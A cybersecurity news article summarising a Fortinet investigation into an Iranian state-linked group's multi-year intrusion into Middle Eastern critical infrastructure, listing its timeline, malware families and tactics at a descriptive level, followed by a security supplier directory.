Iranian Hackers Attacking Critical Infrastructure

An Iranian state-sponsored hacking group has been accused of cyber intrusion aimed at Critical National Infrastructure (CNI) across the a Middle Eastern for over the last two years.

These attacks involved "extensive espionage operations and suspected network prepositioning, a tactic often used to maintain persistent access for future strategic advantage," according the Incident Response team at FortiGuard 

The campaign has persisted from at least May 2023 to February 2025, with some signs of compromise dating as far back as May 2021. 

Attackers initially gained access via stolen VPN credentials and established persistence through multiple web shells and backdoors, including Havoc, HanifNet, HXLibrary, and NeoExpressRAT. They bypassed network segmentation using open-source proxying tools like plink, Ngrok, glider proxy, and ReverseSocks5.

The FortiGuard investigation has produced evidence of a highly sophisticated program of attack, aimed at causing maximum disruption:-

  • The attack unfolded in waves, with the adversary deploying new malware and infrastructure over time. They used custom loaders to execute Havoc and SystemBC in memory.
  •  In addition to publicly available tools, the adversary deployed novel backdoors such as HanifNet, HXLibrary, and NeoExpressRAT, enabling command execution, file operations, and system discovery.
  • The adversary avoided US-based infrastructure, instead relying on non-U.S. VPS providers.
  • Persistence was maintained through scheduled tasks designed to blend in with legitimate Windows processes.
  • Virtualization infrastructure was actively targeted, with the adversary conducting reconnaissance to understand network configurations.
  • After containment efforts, the adversary attempted to regain access by exploiting ZKTeco ZKBioTime software vulnerabilities, which had not been previously reported in the wild. They also launched targeted phishing attacks, using compromised third-party emails to steal administrator credentials.

Fortinet researchers noted that the attack have common characteristics with a known Iranian nation-state threat actor called Lemon Sandstorm, which is also known as Parisite, Pioneer Kitten and UNC757. Evidence suggests that this group has been active since at 2017, striking aerospace, oil and gas, water, and electric sectors across the United States, the Middle East and Europe. 

According to industrial cyber security company Dragos, the hackers used known virtual private network (VPN) security flaws in Fortinet, Pulse Secure, and Palo Alto Networks to obtain initial access. 

In particular, Dragos has identified that the Parisite threat group, operating at least since 2017, is targeting industrial organisations, including those in the oil and gas, water, electric, and gas sectors. These vulnerabilities are being used for initial access to networks and are a key part of the threat group's modus operandi.

The attack analysed by Fortinet against unfolded over four stages starting from May 2023, employing an evolving arsenal of tools as the victim implemented several countermeasures:- 

  • 15 May, 2023 – 29 April, 2024 - Establishing a foothold by using stolen login credentials to access the victim's SSL VPN system, drop web shells on public-facing servers, and deploy three backdoors, Havoc, HanifNet, and HXLibrary, for long-term access.
  • 30 April, 2024 – 22 November, 2024 - Consolidating the foothold by planting more web shells and an additional backdoor called NeoExpressRAT, using tools like plink and Ngrok to burrow deeper into the network, performing targeted exfiltration of the victim's emails, and conducting lateral movement to the virtualisation infrastructure.
  • 23 November, 2024 – 13 December, 2024 - Deploying more web shells and two more backdoors, MeshCentral Agent and SystemBC, in response to initial containment and remediation steps undertaken by the victim.
  • 14 December, 2024 – Present - Attempts to infiltrate the network continue by exploiting known  vulnerabilities and spear-phishing attacks aimed at targeted  employees to steal Microsoft 365 credentials.

Other custom malware families and open-source tools used in the attack included:

  • HanifNet - An unsigned .NET executable that can retrieve and execute commands from a C2 server (First deployed in August 2023).
  • HXLibrary - A malicious IIS module written in .NET that's designed to retrieve three identical text files hosted on Google Docs to fetch the C2 server and send web requests to it (First deployed in October 2023).
  • CredInterceptor - A DLL-based tool that can harvest credentials from the Windows Local Security Authority Subsystem Service process memory.
  • RemoteInjector - A loader component that's used to execute the next-stage payload like Havoc (First deployed in April 2024).
  • RecShell - A web shell used for initial reconnaissance (First deployed in April 2024.
  • NeoExpressRAT - A backdoor that retrieves a configuration from the C2 server and likely uses Discord for follow-on communications (First deployed in August 2024).
  • DropShell - A web shell with basic file upload capabilities (First deployed in November 2024).
  • DarkLoadLibrary - An open-souce loader that's used to launch SystemBC (First deployed in December 2024).

Fortinet said the victim's restricted Operational Technology (OT) network was a key target of the attack based on the threat actor's extensive reconnaissance activity and their breach of a network segment hosting OT-adjacent systems. That said, there is no evidence that the adversary penetrated the OT network.A majority of the malicious activity has been assessed to be hands-on keyboard operations carried out by different individuals, given the command errors and the consistent work schedule.

Furthermore, a deeper examination of the incident has revealed that the threat actor may have had access to the network as early as 15 May 2021."Throughout the intrusion, the attacker leveraged chained proxies and custom implants to bypass network segmentation and move laterally within the environment," Fortinet said. 

"In later stages, they consistently chained four different proxy tools to access internal network segments, demonstrating a sophisticated approach to maintaining persistence and avoiding detection." Fortinet conclude.

Fortinet   |   CISA   |   Dragos   |    Hacker News   |   Hacker News  |   Broadcom  

Image: Ideogram

You Might Also Read:

Chinese Hackers Exploiting Ivanti Connect Secure Vulnerability:


If you like this website and use the comprehensive 7,000-plus service supplier Directory, you can get unrestricted access, including the exclusive in-depth Directors Report series, by signing up for a Premium Subscription.

  • Individual £5 per month or £50 per year. Sign Up
  • Multi-User, Corporate & Library Accounts Available on Request

Cyber Security Intelligence: Captured Organised & Accessible


 






 

« The Seven Pillars Of MLops
What Is An SPF Record For Email? »

Infosecurity Europe
CyberSecurity Jobsite
Perimeter 81

Directory of Suppliers

Clayden Law

Clayden Law

Clayden Law advise global businesses that buy and sell technology products and services. We are experts in information technology, data privacy and cybersecurity law.

IT Governance

IT Governance

IT Governance is a leading global provider of information security solutions. Download our free guide and find out how ISO 27001 can help protect your organisation's information.

North Infosec Testing (North IT)

North Infosec Testing (North IT)

North IT (North Infosec Testing) are an award-winning provider of web, software, and application penetration testing.

The PC Support Group

The PC Support Group

A partnership with The PC Support Group delivers improved productivity, reduced costs and protects your business through exceptional IT, telecoms and cybersecurity services.

Practice Labs

Practice Labs

Practice Labs is an IT competency hub, where live-lab environments give access to real equipment for hands-on practice of essential cybersecurity skills.

Pondurance

Pondurance

Pondurance is an IT Security and Compliance company providing services in Cyber Security, Continuity, Compliance and Threat Management.

Wavestone

Wavestone

Wavestone is a strategy and technology consulting company with areas of expertise including digital transformation and cybersecurity.

XCure Solutions

XCure Solutions

XCure Solutions are a Finnish company specializing in data security, data protection and data recovery.

Flexera

Flexera

Flexera is reimagining the way software is bought, sold, managed and secured.

Eskive

Eskive

Eskive is a Brazilian cyber security awareness and education platform that empowers users and strengthens their company in the face of cyber threats.

Slovak National Accreditation Service (SNAS)

Slovak National Accreditation Service (SNAS)

SNAS is the national accreditation body for Slovakia. The directory of members provides details of organisations offering certification services for ISO 27001.

Inavate Consulting

Inavate Consulting

Inavate Consulting are experts in defining and implementing information assurance solutions and governance frameworks. Our ISO27001 consultants are the most experienced in the industry.

Innovasec

Innovasec

Innovasec provide information security consulting and training services.

Sentor Managed Security Services

Sentor Managed Security Services

Sentor Managed Security Services is a cybersecurity company that enables organizations to exist in a digitally connected world.

East Midlands Cyber Resilience Centre (EMCRC)

East Midlands Cyber Resilience Centre (EMCRC)

The East Midlands Cyber Resilience Centre is set up to support and help protect businesses across the region against cyber crime.

Cyber Protection Group (CPG)

Cyber Protection Group (CPG)

Cyber protection Group specialize in Penetration Testing. We work with enterprise level companies as well as small to medium sized businesses.

Kriptos

Kriptos

Kriptos helps businesses improve their cybersecurity, risk, and compliance strategies by locating critical information through a technology that automatically classifies and labels documents using AI.

ANSSI Burkina Faso

ANSSI Burkina Faso

ANSSI is responsible for managing the security of information systems and cyberspace in Burkina Faso.

DNS Research Federation (DNSRF)

DNS Research Federation (DNSRF)

DNSRF's mission is to advance the understanding of the Domain Name System's impact on cybersecurity, policy and technical standards.

Precision Cybertechnologies & Digital Solutions (Precision-Cyber)

Precision Cybertechnologies & Digital Solutions (Precision-Cyber)

Precision-Cyber was founded on the philosophy of state-of-the-art cybersecurity and digital solutions. Our guiding principle is simply that we will provide and secure all your digital needs.

Bestman Solutions

Bestman Solutions

As a specialist cyber security practice, we believe that people are an organisation’s most valuable asset. Success depends on hiring the right people, and this is where we come in.